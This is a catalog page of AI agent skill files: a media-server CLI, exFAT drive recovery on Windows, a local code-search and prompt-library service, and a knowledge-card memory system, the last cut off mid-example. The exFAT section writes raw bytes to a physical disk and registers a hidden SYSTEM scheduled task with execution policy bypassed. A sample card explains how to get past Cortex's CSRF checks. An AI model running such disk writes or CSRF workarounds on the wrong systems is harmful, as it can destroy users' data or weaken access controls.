media downloads active                 # Active with speed + ETA
media downloads pause <hash|all>
media downloads resume <hash|all>
media downloads remove <hash> [true]   # true = delete files too
```
### Status & Monitoring
```bash
media status        # Health + library counts + active downloads
media queue         # Sonarr/Radarr download queues
media wanted        # Missing episodes + movies
media calendar 14   # Upcoming releases (next N days)
media history       # Recent activity
media refresh       # Trigger library rescan
media indexers      # Prowlarr indexer status
```
### Subtitles (Bazarr)
```bash
media subs           # Wanted subtitles
media subs history   # Recent subtitle downloads
```
### Requests (Jellyseerr)
```bash
media requests            # Pending user requests
media requests trending   # What's trending
media requests users      # User list with request counts
```
### Transcoding (Tdarr)
```bash
media tdarr           # Status + active workers
media tdarr workers   # Per-file progress: %, fps, ETA
media tdarr queue     # Items queued for processing
```
## Connection Modes
### Local (services on same machine)
```
MEDIA_HOST="local"
```
### Remote via SSH (services on another host)
```
MEDIA_HOST="ssh:hyperv-host"   # Uses SSH config alias
MEDIA_HOST_OS="linux"          # or "windows"
```
SSH mode tunnels all API calls through your existing SSH config. Services stay on localhost and are never exposed to the network. No additional ports or credentials needed beyond your normal SSH access.
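As a rough illustration of the SSH mode described above, the sketch below shows one way a client could turn a `MEDIA_HOST` value into an `ssh` command that runs `curl` on the remote host against a localhost-only service. It is not taken from the `media` script: the function names, the example URL, and the API key value are assumptions made for illustration, and it only covers a Linux remote host.

```python
import shlex
from typing import List, Optional, Tuple


def parse_media_host(value: str) -> Tuple[str, Optional[str]]:
    """Split a MEDIA_HOST value into (mode, ssh_alias)."""
    if value == "local":
        return ("local", None)
    if value.startswith("ssh:") and len(value) > 4:
        return ("ssh", value[4:])
    raise ValueError(f"unsupported MEDIA_HOST value: {value!r}")


def build_api_command(media_host: str, url: str, api_key: str) -> List[str]:
    """Return an argv list that fetches `url`, locally or through SSH."""
    curl = ["curl", "-s", "-H", f"X-Api-Key: {api_key}", url]
    mode, alias = parse_media_host(media_host)
    if mode == "local":
        return curl
    # ssh joins its arguments into a single remote shell command,
    # so each part is quoted for a POSIX shell on the remote side.
    remote = " ".join(shlex.quote(part) for part in curl)
    return ["ssh", alias, remote]
```

For example, `build_api_command("ssh:hyperv-host", "http://localhost:8989/api/v3/system/status", key)` yields an `ssh hyperv-host 'curl ...'` invocation that can be passed to `subprocess.run`. The request is issued on the remote machine, so the service never needs to listen on anything but localhost.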
Windows hosts automatically use PowerShell's `Invoke-RestMethod` for POST requests.
## AI Agent Integration
Commands are designed for easy parsing by AI agents. Any tool that can run shell commands works:
```
"What shows am I missing episodes for?" → media wanted
"Add Succession" → media shows add "Succession"
"What's downloading right now?" → media downloads active
"Pause all downloads" → media downloads pause all
```
Works with OpenClaw, LangChain, Claude computer use, or any agent framework with shell execution.
## Requirements
- bash 4.0+
- curl
- python3 (standard library only, no pip)
- ssh (only for remote mode)
## Technical Details
- Single bash script (~900 lines)
- Talks to *arr v3 APIs (Sonarr/Radarr), v1 (Prowlarr), v2 (qBittorrent WebUI)
- Python3 used strictly for JSON parsing (standard library)
- No telemetry, no analytics, no network calls except to your own services
- Config stored at `~/.config/media-cli/config` with chmod 600
FILE:README.md
# media-cli
Single-file bash CLI for the *arr media stack. Manage Sonarr, Radarr, Prowlarr, qBittorrent, Bazarr, Jellyseerr, and Tdarr from the terminal. Works locally or over SSH to remote hosts (including Windows).
## Install
```bash
git clone https://github.com/solomonneas/media-cli.git
cd media-cli
cp media ~/bin/media && chmod +x ~/bin/media
media setup
```
## Highlights
- **One script, no dependencies** (just bash, curl, python3)
- **SSH remote mode** for headless servers. Services stay on localhost, CLI tunnels through SSH
- **Windows support** via PowerShell Invoke-RestMethod over SSH
- **AI-friendly** output designed for agent parsing
- **7 services** managed from one command
## Source
https://github.com/solomonneas/media-cli
## Tags
media, sonarr, radarr, plex, jellyfin, torrents, automation, homelab, arr
Recover corrupted exFAT USB drives on Windows without formatting. Diagnose boot region corruption, repair with chkdsk or TestDisk, and prevent future corrupt...
---
name: exfat-recovery
version: 1.0.0
description: "Recover corrupted exFAT USB drives on Windows without formatting. Diagnose boot region corruption, repair with chkdsk or TestDisk, and prevent future corruption with write cache fixes, shutdown flush scripts, and automated boot region backups. Covers the 'needs to be formatted' panic scenario."
tags:
- exfat
- recovery
- usb
- windows
- data-recovery
- sysadmin
- filesystem
category: tools
---
# exFAT Recovery — Fix "Needs to be Formatted" Without Losing Data
When Windows says your external drive "needs to be formatted," your data is almost always fine. The exFAT boot region got corrupted (usually from write caching + unexpected shutdown). This skill walks through diagnosis, repair, and prevention.
## When to Use
- External USB drive suddenly says "needs to be formatted"
- Drive shows in Disk Management but filesystem is blank
- chkdsk reports "Corruption was found while examining the boot region"
- Any exFAT drive that won't mount after a crash or reboot
## Diagnosis
### Step 1: Confirm the drive is recognized
```powershell
Get-Disk | Format-Table Number, FriendlyName, Size, PartitionStyle, OperationalStatus, HealthStatus -AutoSize
```
If `HealthStatus: Healthy` and `OperationalStatus: Online`, the hardware is fine. If not, you have a hardware problem (different fix).
### Step 2: Check the partition exists
```powershell
Get-Partition -DriveLetter H | Format-Table PartitionNumber, DriveLetter, Size, Type -AutoSize
```
Partition visible = partition table intact. Good sign.
### Step 3: Check filesystem status
```powershell
Get-Volume -DriveLetter H | Format-List DriveLetter, FileSystem, Size, SizeRemaining, HealthStatus
```
If `FileSystem` is blank and `Size` is 0, the filesystem metadata is corrupted but the partition is there.
### Step 4: Read-only chkdsk to confirm
```powershell
chkdsk H:
```
Look for: `Corruption was found while examining the boot region.` This confirms it's fixable.
## Recovery
### Option 1: chkdsk /F (try this first)
Run as Administrator:
```powershell
chkdsk H: /F
```
This repairs the exFAT boot region from the backup copy (exFAT stores backup boot sectors at sectors 12-23). On an 8TB drive with ~140K files, it takes a few minutes.
Verify after:
```powershell
Get-Volume -DriveLetter H
Get-ChildItem H:\ | Select-Object Name | Format-Table -AutoSize
```
### Option 2: TestDisk (if chkdsk fails)
1. Download from https://www.cgsecurity.org/wiki/TestDisk
2. Run `testdisk_win.exe` as Administrator
3. Select physical disk → GPT → Advanced → Boot
4. TestDisk rebuilds the boot sector from the backup copy
### Option 3: Data recovery tools (last resort)
If the filesystem is unrecoverable:
- **R-Studio** (paid, best for exFAT) — recovers directory structure
- **PhotoRec** (free) — recovers files by type, loses filenames
- **DMDE** (free tier) — good at exFAT reconstruction
## Prevention
### 1. Disable write caching (most important)
Write caching is the #1 cause of exFAT corruption on external drives.
**Device Manager method:**
1. Device Manager → Disk drives → your external drive
2. Properties → Policies tab
3. Select "Quick removal" (disables write cache)
**PowerShell (scriptable):**
```powershell
# Adjust Ven_ and Prod_ to match your drive
$devPath = "HKLM:\SYSTEM\CurrentControlSet\Enum\SCSI\Disk&Ven_Samsung&Prod_PSSD_T5_EVO"
$instances = Get-ChildItem $devPath
foreach ($inst in $instances) {
    $diskParamPath = Join-Path $inst.PSPath "Device Parameters\Disk"
    if (Test-Path $diskParamPath) {
        Set-ItemProperty -Path $diskParamPath -Name "UserWriteCacheSetting" -Value 0 -Type DWord
    }
}
```
### 2. Shutdown flush script
Insurance even with write caching disabled. Use `scripts/safe-shutdown.ps1` and register it as a Group Policy shutdown script. See `references/prevention-scripts.md` for the full setup.
### 3. Weekly boot region backup
Use `scripts/backup-boot-region.ps1` to save a copy of the exFAT boot region every week. If corruption happens again, restore from backup instead of hoping chkdsk works.
### 4. Restore from backup
```powershell
# Run as Admin - writes raw bytes to disk
$disk = "\\.\PhysicalDrive3" # adjust
$offset = 16777216 # partition offset in bytes
$backupFile = "C:\path\to\exfat_boot_region_YYYYMMDD.bin"
$buf = [System.IO.File]::ReadAllBytes($backupFile)
$fs = [System.IO.File]::Open($disk, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Write, [System.IO.FileShare]::ReadWrite)
[void]$fs.Seek($offset, [System.IO.SeekOrigin]::Begin)
$fs.Write($buf, 0, $buf.Length)
$fs.Flush()
$fs.Close()
# Then: chkdsk H: /F
```
## Key Facts
- "Needs to be formatted" almost always means corrupted metadata, NOT lost data
- exFAT doesn't journal like NTFS, so it's fragile on unexpected shutdowns
- exFAT keeps a backup boot region at sectors 12-23 of the partition
- chkdsk /F fixes most cases by restoring from this backup
- Write caching on external drives is the #1 cause. Disable it.
- DO NOT format the drive. That actually destroys the data.
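To make the main/backup boot region layout concrete, here is a minimal sketch that checks a saved 24-sector boot region dump before it is trusted for a restore. It assumes 512-byte sectors (the same assumption the backup script makes) and follows the checksum rule from the published exFAT specification: a 32-bit rotate-and-add over sectors 0-10 that skips the VolumeFlags and PercentInUse bytes, with the result repeated throughout sector 11. The function names are hypothetical.

```python
import struct

EXFAT_NAME = b"EXFAT   "   # FileSystemName field, bytes 3-10 of the boot sector
SECTORS_PER_REGION = 12    # main region: sectors 0-11, backup region: sectors 12-23


def boot_checksum(region: bytes, sector_size: int) -> int:
    """32-bit checksum over sectors 0-10 of one boot region."""
    checksum = 0
    for index in range(11 * sector_size):
        if index in (106, 107, 112):  # VolumeFlags (2 bytes) and PercentInUse
            continue
        rotated = ((checksum & 1) << 31) | (checksum >> 1)
        checksum = (rotated + region[index]) & 0xFFFFFFFF
    return checksum


def region_ok(region: bytes, sector_size: int) -> bool:
    """True if the region has the exFAT name and a matching checksum sector."""
    if len(region) < SECTORS_PER_REGION * sector_size:
        return False
    if region[3:11] != EXFAT_NAME:
        return False
    stored = region[11 * sector_size:12 * sector_size]
    expected = struct.pack("<I", boot_checksum(region, sector_size))
    return stored == expected * (sector_size // 4)


def check_backup(data: bytes, sector_size: int = 512) -> dict:
    """Validate the main and backup regions inside a 24-sector dump."""
    size = SECTORS_PER_REGION * sector_size
    return {
        "main_ok": region_ok(data[:size], sector_size),
        "backup_ok": region_ok(data[size:2 * size], sector_size),
    }
```

Reading a dump with `open(path, "rb").read()` and passing it to `check_backup` gives a quick sanity check. If `main_ok` is false but `backup_ok` is true, the dump matches the situation this skill describes, where the backup region is still usable.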
## Root Cause
exFAT has no journaling. When Windows has write caching enabled for an external drive and the system reboots (crash, update, power loss), dirty cached writes never flush. The boot region (filesystem's "table of contents") gets partially written and becomes unreadable. The actual file data on disk is untouched.
FILE:README.md
# exfat-recovery
Recover corrupted exFAT USB drives on Windows without formatting. When Windows says "needs to be formatted," your data is almost always fine.
## The Problem
exFAT doesn't journal like NTFS. Unexpected shutdowns with write caching enabled corrupt the boot region (filesystem's table of contents). Windows can't read the drive but the actual files are untouched.
## What This Skill Does
1. **Diagnose** — Confirm it's boot region corruption, not hardware failure
2. **Recover** — chkdsk /F (uses exFAT's built-in backup boot region), TestDisk, or data recovery tools
3. **Prevent** — Disable write caching, shutdown flush scripts, automated weekly boot region backups
## Works With
Any exFAT external drive on Windows (USB-C SSDs, flash drives, SD cards). Tested on Samsung T5 EVO 8TB.
## Tags
exfat, recovery, usb, windows, data-recovery, sysadmin, filesystem
FILE:references/prevention-scripts.md
# Prevention Scripts Setup
## Shutdown Flush Script
Flushes write cache before Windows shuts down.
### Create the script
Save as `C:\Users\<user>\backups\safe_shutdown.ps1`:
```powershell
# Shutdown scripts run as SYSTEM, where $env:USERNAME is the machine account, so set the path explicitly.
$logPath = "C:\Users\<user>\backups\shutdown_log.txt"
$timestamp = Get-Date -Format "yyyy-MM-dd HH:mm:ss"
try {
    Write-VolumeCache -DriveLetter H -ErrorAction Stop
    "$timestamp : Flushed write cache for H:" | Out-File $logPath -Append
} catch {
    "$timestamp : ERROR flushing cache - $($_.Exception.Message)" | Out-File $logPath -Append
}
```
### Register as Group Policy shutdown script
Run as Administrator:
```powershell
$shutdownScript = "C:\Users\$env:USERNAME\backups\safe_shutdown.ps1"
foreach ($basePath in @(
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Shutdown\0",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Scripts\Shutdown\0"
)) {
    $scriptKey = "$basePath\0"
    if (-not (Test-Path $basePath)) { New-Item -Path $basePath -Force | Out-Null }
    Set-ItemProperty -Path $basePath -Name "GPO-ID" -Value "LocalGPO" -Type String
    Set-ItemProperty -Path $basePath -Name "SOM-ID" -Value "Local" -Type String
    Set-ItemProperty -Path $basePath -Name "FileSysPath" -Value "C:\Windows\System32\GroupPolicy\Machine" -Type String
    Set-ItemProperty -Path $basePath -Name "DisplayName" -Value "Local Group Policy" -Type String
    Set-ItemProperty -Path $basePath -Name "GPOName" -Value "Local Group Policy" -Type String
    Set-ItemProperty -Path $basePath -Name "PSScriptOrder" -Value 1 -Type DWord
    if (-not (Test-Path $scriptKey)) { New-Item -Path $scriptKey -Force | Out-Null }
    Set-ItemProperty -Path $scriptKey -Name "Script" -Value $shutdownScript -Type String
    Set-ItemProperty -Path $scriptKey -Name "Parameters" -Value "" -Type String
    Set-ItemProperty -Path $scriptKey -Name "IsPowershell" -Value 1 -Type DWord
    # 16 zero bytes. (0x00 * 16) evaluates to the integer 0 and would yield a 1-byte array.
    Set-ItemProperty -Path $scriptKey -Name "ExecTime" -Value (New-Object byte[] 16) -Type Binary
}
```
## Boot Region Backup (Weekly)
### Create the backup script
Save as `C:\Users\<user>\backups\backup_boot_region.ps1`:
```powershell
$ErrorActionPreference = "Stop"
# Find your disk number: Get-Partition -DriveLetter H | Select DiskNumber
# Find offset: Get-Partition -DriveLetter H | Select Offset
$disk = "\\.\PhysicalDrive3"
$offset = 16777216 # partition offset in bytes
$size = 24 * 512 # 24 sectors (12 main + 12 backup boot region)
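# The scheduled task runs as SYSTEM, where $env:USERNAME is the machine account, so set the path explicitly.
$outDir = "C:\Users\<user>\backups\exfat_boot"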
$outPath = "$outDir\exfat_boot_region_$(Get-Date -Format 'yyyyMMdd').bin"
$logPath = "$outDir\backup_log.txt"
if (-not (Test-Path $outDir)) { New-Item -ItemType Directory -Path $outDir -Force | Out-Null }
try {
    $fs = [System.IO.File]::Open($disk, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite)
    [void]$fs.Seek($offset, [System.IO.SeekOrigin]::Begin)
    $buf = New-Object byte[] $size
    $read = $fs.Read($buf, 0, $size)
    $fs.Close()
    [System.IO.File]::WriteAllBytes($outPath, $buf)
    "$(Get-Date): Backed up $read bytes to $outPath" | Out-File $logPath -Append
} catch {
    "$(Get-Date): ERROR - $_" | Out-File $logPath -Append
}
```
### Create scheduled task
```powershell
$action = New-ScheduledTaskAction -Execute "powershell.exe" `
-Argument "-ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File `"C:\Users\$env:USERNAME\backups\backup_boot_region.ps1`""
$trigger = New-ScheduledTaskTrigger -Weekly -DaysOfWeek Sunday -At "3:00AM"
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest -LogonType ServiceAccount
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName "BackupExFATBootRegion" -Action $action -Trigger $trigger `
-Principal $principal -Settings $settings -Description "Weekly backup of exFAT boot region"
```
Lightweight agent productivity toolkit: semantic code search with embeddings and a categorized prompt library. Two services, ~200MB RAM, zero cloud dependenc...
---
name: ops-deck-lite
version: 1.0.0
description: "Lightweight agent productivity toolkit: semantic code search with embeddings and a categorized prompt library. Two services, ~200MB RAM, zero cloud dependencies. Your agent searches code by meaning (not grep) and reuses proven prompts instead of writing from scratch every time."
tags:
- code-search
- prompt-library
- embeddings
- productivity
- semantic-search
- agent-tools
category: tools
---
# Ops Deck Lite — Code Search + Prompt Library
Two high-impact services that make any AI agent dramatically more efficient: semantic code search and a categorized prompt library. Lightweight (~200MB RAM), local-only, zero cloud costs.
For the full operational stack (agent intel, social pipeline, dev journal, monitoring), see `ops-deck`.
## What You Get
### 1. Semantic Code Search (:5204)
Search your entire codebase by meaning, not just text matching. Ask "authentication middleware" and find the actual auth code even if it's called `verifyToken` or `checkSession`.
- **Hybrid search**: vector similarity + keyword matching
- **Local embeddings**: qwen3-embedding:8b via Ollama (free, private)
- **Code summaries**: each chunk gets a natural language summary for better semantic matching
- **Fast**: <100ms search across 96K+ code chunks
- **Nightly re-index**: cron at 4am keeps the index fresh
```bash
# Search
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"database connection pooling","mode":"hybrid","limit":10}'
# Health check
curl -s http://localhost:5204/api/health
# Re-index (with summaries)
curl -X POST "http://localhost:5204/api/index?summarize=true"
# Filter by project
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"error handling","mode":"hybrid","project":"my-api","limit":5}'
```
**Modes:**
- `hybrid` (default, best) — combines vector similarity with text matching
- `code` — raw code matching only
- `summary` — search against natural language summaries
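The same search call can be made from Python with only the standard library. The sketch below mirrors the curl examples above; the helper names are hypothetical, and because the response format is not documented here, `search` simply returns whatever JSON the service sends back.

```python
import json
import urllib.request

BASE_URL = "http://localhost:5204"  # port taken from the examples above
MODES = ("hybrid", "code", "summary")


def build_search_request(query, mode="hybrid", limit=10, project=None):
    """Build the POST /api/search request without sending it."""
    if mode not in MODES:
        raise ValueError(f"unknown mode: {mode!r}")
    payload = {"query": query, "mode": mode, "limit": limit}
    if project is not None:
        payload["project"] = project
    return urllib.request.Request(
        f"{BASE_URL}/api/search",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def search(query, **kwargs):
    """Send the request and return the decoded JSON body."""
    request = build_search_request(query, **kwargs)
    with urllib.request.urlopen(request, timeout=10) as response:
        return json.load(response)
```

Keeping request construction separate from sending makes the payload easy to inspect or log before an agent fires it at the service.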
### 2. Prompt Library (:5202)
Categorized, searchable prompt templates. Stop writing the same prompts from scratch every session.
```bash
# List all prompts
curl -s http://localhost:5202/api/prompts | python3 -c "
import sys,json
[print(f'{p[\"id\"]}: {p[\"title\"]} [{p[\"category\"]}]') for p in json.load(sys.stdin)]
"
# Get a specific prompt
curl -s http://localhost:5202/api/prompts/<id>
# Create a prompt
curl -s -X POST http://localhost:5202/api/prompts \
-H "Content-Type: application/json" \
-d '{"title":"Code Review","category":"coding","content":"Review this code for..."}'
```
## Prerequisites
- Node.js 18+ (for prompt library)
- Python 3.10+ with FastAPI and uvicorn (for code search)
- Ollama with `qwen3-embedding:8b` model
- PM2 for process management
- SQLite (for code search index, no external DB)
## Setup
### 1. Install dependencies
```bash
npm install -g pm2
pip install fastapi uvicorn aiofiles
# Ollama embedding model
ollama pull qwen3-embedding:8b
```
### 2. Create the Code Search service
```bash
mkdir -p pipeline/work/code-search
cd pipeline/work/code-search
# The server needs:
# - server.py (FastAPI app)
# - code_index.db (SQLite, auto-created on first index)
# - Ollama running locally for embeddings
```
Key code search server features:
- Walks your project directories, splits code into chunks
- Generates embeddings via Ollama API (localhost:11434)
- Stores chunks + embeddings + summaries in SQLite
- FastAPI with POST /api/search, GET /api/health, POST /api/index
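The indexing steps listed above can be sketched as follows. This is an illustration under stated assumptions, not the actual `server.py`: the fixed 40-line chunking, the table schema, and the function names are invented for the example, and `ollama_embed` assumes Ollama's `/api/embeddings` endpoint, which takes a `prompt` and returns an `embedding` list.

```python
import json
import sqlite3
import urllib.request
from typing import Callable, Iterable, List, Tuple


def chunk_lines(text: str, max_lines: int = 40) -> List[str]:
    """Split source text into fixed-size line chunks (assumed strategy)."""
    lines = text.splitlines()
    return ["\n".join(lines[i:i + max_lines]) for i in range(0, len(lines), max_lines)]


def ollama_embed(text: str, model: str = "qwen3-embedding:8b",
                 host: str = "http://localhost:11434") -> List[float]:
    """Request one embedding from a local Ollama instance."""
    body = json.dumps({"model": model, "prompt": text}).encode("utf-8")
    request = urllib.request.Request(
        f"{host}/api/embeddings", data=body,
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request, timeout=60) as response:
        return json.load(response)["embedding"]


def index_files(conn: sqlite3.Connection,
                files: Iterable[Tuple[str, str]],
                embed: Callable[[str], List[float]]) -> int:
    """Store (path, position, content, embedding) rows; return the chunk count."""
    conn.execute(
        "CREATE TABLE IF NOT EXISTS chunks "
        "(path TEXT, position INTEGER, content TEXT, embedding TEXT)"
    )
    count = 0
    for path, text in files:
        for position, chunk in enumerate(chunk_lines(text)):
            conn.execute(
                "INSERT INTO chunks VALUES (?, ?, ?, ?)",
                (path, position, chunk, json.dumps(embed(chunk))),
            )
            count += 1
    conn.commit()
    return count
```

Passing the embedding function in as a parameter keeps the storage logic testable without a running model; in real use it would be `index_files(conn, files, ollama_embed)`.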
### 3. Create the Prompt Library
```bash
mkdir -p pipeline/work/prompt-library/backend
cd pipeline/work/prompt-library/backend
# Express server with:
# - GET /api/prompts (list all)
# - GET /api/prompts/:id (get one)
# - POST /api/prompts (create)
# - PUT /api/prompts/:id (update)
# - DELETE /api/prompts/:id (delete)
# - SQLite or JSON file storage
```
### 4. PM2 config
```javascript
// ecosystem.config.cjs
module.exports = {
  apps: [
    {
      name: 'code-search',
      cwd: './pipeline/work/code-search',
      script: 'server.py',
      interpreter: 'python3',
      autorestart: true,
    },
    {
      name: 'prompt-library-api',
      cwd: './pipeline/work/prompt-library/backend',
      script: 'server.js',
      autorestart: true,
    },
  ]
};
```
### 5. Start and index
```bash
pm2 start ecosystem.config.cjs
pm2 save
# Initial code index (takes a few minutes depending on codebase size)
curl -X POST "http://localhost:5204/api/index?summarize=true"
# Set up nightly re-index
(crontab -l 2>/dev/null; echo "0 4 * * * curl -s -X POST 'http://localhost:5204/api/index?summarize=true' > /dev/null") | crontab -
```
## Agent Integration
Add to your AGENTS.md or TOOLS.md:
```markdown
## Code Search API (USE THIS FIRST)
Before you grep, before you spawn a sub-agent, before you read 10 files: HIT THIS API.
curl -s -X POST http://localhost:5204/api/search \
-H "Content-Type: application/json" \
-d '{"query":"your search here","mode":"hybrid","limit":10}'
## Prompt Library
Before writing a prompt from scratch, check if one exists:
curl -s http://localhost:5202/api/prompts
```
## Resource Usage
| Service | RAM | CPU | Disk |
|---------|-----|-----|------|
| Code Search | ~150MB | <1% idle | ~50MB index per 100K chunks |
| Prompt Library | ~50MB | <1% idle | <1MB |
| Ollama (embedding model) | ~4GB | Spikes during indexing | ~4GB model |
Total: ~200MB for the services (Ollama runs independently and is shared with other tools).
## Why Not Just Grep?
Grep finds exact text matches. Code search finds **meaning**:
| Query | Grep finds | Code Search finds |
|-------|-----------|-------------------|
| "auth middleware" | Files containing "auth middleware" | `verifyToken()`, `checkSession()`, `requireAuth()` |
| "database pooling" | Files containing "database pooling" | `createPool()`, `getConnection()`, `pg.Pool` config |
| "error handling" | Files containing "error handling" | try/catch blocks, error middleware, custom Error classes |
The embeddings understand code semantics. That's the whole point.
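To show what combining vector similarity with keyword matching can look like, here is a small scoring sketch. The weighting scheme, the `alpha` value, and the function names are assumptions for illustration; the actual service may rank results differently.

```python
import math
import re


def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm = math.sqrt(sum(x * x for x in a)) * math.sqrt(sum(y * y for y in b))
    return dot / norm if norm else 0.0


def keyword_score(query, text):
    """Fraction of query words that also occur in the chunk text."""
    terms = set(re.findall(r"\w+", query.lower()))
    if not terms:
        return 0.0
    words = set(re.findall(r"\w+", text.lower()))
    return len(terms & words) / len(terms)


def hybrid_score(query, query_vec, chunk_text, chunk_vec, alpha=0.7):
    """Weighted blend: alpha for the vector part, the rest for keywords."""
    vector_part = cosine(query_vec, chunk_vec)
    keyword_part = keyword_score(query, chunk_text)
    return alpha * vector_part + (1 - alpha) * keyword_part
```

With this blend, a chunk such as `verifyToken()` can still rank well for "auth middleware" through the vector term alone, while exact keyword hits get a modest boost.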
FILE:README.md
# ops-deck-lite
Lightweight agent productivity toolkit: semantic code search with local embeddings and a categorized prompt library. Two services, ~200MB RAM, zero cloud dependencies.
## Why
- **Code Search**: Your agent searches code by meaning, not grep. Ask "authentication middleware" and find `verifyToken()` even though the word "middleware" never appears in that file.
- **Prompt Library**: Stop writing the same prompts from scratch every session. Categorized, searchable, versioned.
## Stack
- **Code Search** (:5204) — FastAPI + SQLite + qwen3-embedding:8b via Ollama
- **Prompt Library** (:5202) — Express/Node + SQLite or JSON
Both managed by PM2. Total ~200MB RAM.
## Quick Start
```bash
ollama pull qwen3-embedding:8b
npm install -g pm2
pm2 start ecosystem.config.cjs
curl -X POST "http://localhost:5204/api/index?summarize=true"
```
## For the full stack, see `ops-deck`
Adds agent intel, social pipeline, dev journal, variant gallery, and system monitoring.
## Tags
code-search, prompt-library, embeddings, productivity, semantic-search, agent-tools
Knowledge card memory system with semantic search. Agents wake up fresh each session but remember everything through atomic ~350-token cards with YAML frontm...
---
name: self-learning-agent
version: 1.0.0
description: "Knowledge card memory system with semantic search. Agents wake up fresh each session but remember everything through atomic ~350-token cards with YAML frontmatter, daily logs, and a slim master index. Captures lessons, corrections, preferences, and facts automatically. Built for agents that need persistent memory across sessions."
tags:
- memory
- learning
- self-improving
- knowledge-management
- agent-memory
- persistence
category: agent
---
# Self-Learning Agent — Knowledge Card Memory System
A production-tested memory architecture for AI agents that wake up fresh each session. Instead of one monolithic memory file that grows until it's unusable, this system uses atomic knowledge cards (~350 tokens each) searched semantically, daily logs for raw notes, and a slim master index loaded every session.
## Architecture
```
workspace/
├── MEMORY.md # Master index (~2KB, loaded every session)
├── memory/
│ ├── cards/ # Knowledge cards (~350 tokens each)
│ │ ├── topic-name.md # One topic per file, YAML frontmatter
│ │ ├── another-topic.md
│ │ └── ...
│ └── YYYY-MM-DD.md # Daily session logs (raw notes)
```
### Why This Works
- **MEMORY.md** is tiny (~2KB). It loads fast, gives the agent orientation, and points to everything else.
- **Knowledge cards** are atomic. Each one covers ONE topic in ~350 tokens. Semantic search finds the right cards without loading everything.
- **Daily logs** are append-only scratch pads. Raw session notes, not curated.
- **Cards are curated wisdom. Daily logs are raw data.** The agent periodically distills daily logs into cards during maintenance.
## Setup
### 1. Create the directory structure
```bash
mkdir -p memory/cards
```
### 2. Create MEMORY.md (master index)
This file is loaded every session. Keep it under 2KB. It should contain:
```markdown
# MEMORY.md — Master Index
## How Memory Works
- **This file:** Slim index (~2KB). Loaded every main session.
- **Knowledge cards:** `memory/cards/*.md` (~N cards, ~350 tokens each). Searched semantically.
- **Daily logs:** `memory/YYYY-MM-DD.md`. Raw session notes.
- **DO NOT** dump everything here. Write knowledge cards instead.
## Identity
[Agent name, model, owner, key facts]
## Quick Context
[2-3 lines of what matters right now]
## Card Categories
[Table mapping categories to card topics]
## Current Priorities
[What's actively being worked on]
```
### 3. Add to your AGENTS.md / system prompt
```markdown
## Every Session
1. Read MEMORY.md (slim index)
2. Use `memory_search` to find context relevant to the current task
3. Skim today + yesterday daily logs for recent context
4. Start working
## Memory Rules
- "Mental notes" don't survive session restarts. Files do.
- When someone says "remember this" → write a knowledge card
- When you learn a lesson → write a knowledge card
- When you make a mistake → document it so future-you doesn't repeat it
```
## Knowledge Card Format
Every card has YAML frontmatter and dense content:
```markdown
---
topic: Descriptive Topic Name
category: system|human|infrastructure|tools|workflow|projects|lessons|career|security|models
tags: [tag1, tag2, tag3]
created: YYYY-MM-DD
updated: YYYY-MM-DD
---
The actual content. Dense, factual, no fluff.
Write for future-you who has zero context.
Include specific commands, paths, config values.
Keep under 350 tokens.
```
### Card Quality Rules
1. **ONE topic per card.** Three insights = three cards.
2. **~350 tokens max.** Dense beats verbose.
3. **Zero-context readable.** Include specifics (commands, paths, values).
4. **Tags are searchable keywords.** Lowercase, hyphenated.
5. **Update, don't duplicate.** If a card exists for the topic, merge new info into it.
6. **No fluff.** Every sentence should contain a fact, a command, or a decision.
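Several of these rules can be checked mechanically. The sketch below is one possible linter, with stated assumptions: it parses only flat `key: value` frontmatter (no YAML library), it estimates tokens at roughly four characters each rather than using a real tokenizer, and all function names are hypothetical.

```python
import re

CATEGORIES = {
    "system", "human", "infrastructure", "tools", "workflow",
    "projects", "lessons", "career", "security", "models",
}
REQUIRED = ("topic", "category", "tags", "created", "updated")


def parse_card(text):
    """Split a card into (frontmatter dict, body)."""
    match = re.match(r"^---\n(.*?)\n---\n?(.*)$", text, re.DOTALL)
    if not match:
        raise ValueError("missing YAML frontmatter")
    meta = {}
    for line in match.group(1).splitlines():
        key, sep, value = line.partition(":")
        if sep:
            meta[key.strip()] = value.strip()
    return meta, match.group(2).strip()


def estimate_tokens(body):
    """Rough heuristic: about 4 characters per token."""
    return len(body) // 4


def check_card(text, max_tokens=350):
    """Return a list of rule violations; an empty list means the card passes."""
    meta, body = parse_card(text)
    problems = [f"missing field: {name}" for name in REQUIRED if not meta.get(name)]
    category = meta.get("category")
    if category and category not in CATEGORIES:
        problems.append(f"unknown category: {category}")
    raw_tags = meta.get("tags", "").strip("[]")
    for tag in (t.strip() for t in raw_tags.split(",")):
        if tag and not re.fullmatch(r"[a-z0-9]+(-[a-z0-9]+)*", tag):
            problems.append(f"tag not lowercase-hyphenated: {tag}")
    if estimate_tokens(body) > max_tokens:
        problems.append("body over token budget")
    return problems
```

A check like this only covers the structural rules; whether a card is dense, single-topic, and readable with zero context still needs judgment.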
### Good Card Example
```markdown
---
topic: Cortex CSRF Automation
category: infrastructure
tags: [cortex, csrf, thehive, api, security]
created: 2026-03-19
updated: 2026-03-19
---
Cortex 3.1.8 uses non-standard CSRF. Cookie: CORTEX-XSRF-TOKEN, header: X-CORTEX-XSRF-TOKEN.
Standard Play Framework bypass headers (Csrf-Token: nocheck) do NOT work.
Flow: Login → GET any endpoint with session cookie → capture CORTEX-XSRF-TOKEN from Set-Cookie →
send as both cookie AND X-CORTEX-XSRF-TOKEN header on all POST/PUT/DELETE.
Shortcut: After generating first API key, use Authorization: Bearer which bypasses CSRF entirely.
First-user POST /api/user (no auth) only works when zero users exist in DB.
```
### Bad Card Example
```markdown
---
